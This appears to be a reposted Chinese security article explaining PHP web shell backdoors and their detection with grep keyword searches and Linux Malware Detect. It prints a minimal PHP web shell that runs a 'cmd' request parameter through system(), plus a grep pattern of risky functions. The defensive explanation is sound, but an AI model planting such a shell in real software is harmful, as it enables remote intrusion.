这些讨厌的 shell 究竟做了什么?
发布时间:2022-04-22 09:48:43 所属栏目:安全 来源:互联网
导读:网页服务器已经成为当前恶意活动的主要目标之一,而且常常被视为机构基础设施内部的主要薄弱环节。网页应用程序代码总是在相关机构部署之后就被忘在一边或是处于无人维护的状态,这就使其很容易作为整套体系中的缺口受到攻击。网页应用程序在开发中常常会用
|
网页服务器已经成为当前恶意活动的主要目标之一,而且常常被视为机构基础设施内部的主要薄弱环节。网页应用程序代码总是在相关机构部署之后就被忘在一边或是处于无人维护的状态,这就使其很容易作为整套体系中的缺口受到攻击。网页应用程序在开发中常常会用到例如PHP,Python,Ruby以及Perl等脚本语言。由于这些语言自身的复杂性,因此很容易导致网页应用程序在执行任意脚本代码的过程中产生安全问题。 这些讨厌的"shell"到底做了什么? 当上述条件得到满足时,攻击者们往往会寻求一种利用部署网页shell代码并进行持续访问的方式来发动入侵。这种代码会建立起一套可以顺利访问网页服务器的"虚拟"shell。这种shell通常会在系统接受的指令执行及文件访问动作中,夹杂其它讨厌的恶意功能。 这里我们所讨论的后门类型仅限于网页shell。网页shell型后门可被定义为:以一种非公开的方式在动态服务器端的网页页面中获取对计算机系统控制台的访问权限。一般来说这些网页shell构造简单、易于检测。举例说明,让我们一起看看下面这个PHP文件: 复制 if(isset($_REQUEST['cmd'])){ echo " <pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre> 而更复杂的网页shell则包含了与控制台的交互方式及文件编辑等内容。C99 shell所提供的自述文件(C99 shell是一款已经诞生将近十年的后门工具)中,规定了如下的特性: 像C99这样的shell能够通过制定一些关键词搜索的方式被检测出来,当然使用一款基于签名认证的检测工具也同样可以做到。我们可以通过检索下面这一串内容来从网页服务器中尝试找出PHP后门(本例子借鉴于Steven Whitney的相关论著): 复制 grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)"/pathto/webdir/ 1. 可以想见,这种检索方式会产生大量误报,因为这些回馈有很大一部分来自合法的网页应用程序。我们也可以尝试利用类似Linux恶意软件检测(简称LMD)的工具。我们运行Linux恶意软件检测来对一款网页指令型shell所制造的九十个后门进行检测,而LMD能够通过扫描找出全部九十个后门中的三十七个。这么低的识别率其实并不奇怪,因为网页shell中有一些是专门针对Windows操作系统所设计的。而真正令人惊讶的是Linux恶意软件检测并没能够识别出诸如isko,shellzx这些致命的网页shell。 (编辑:东莞站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐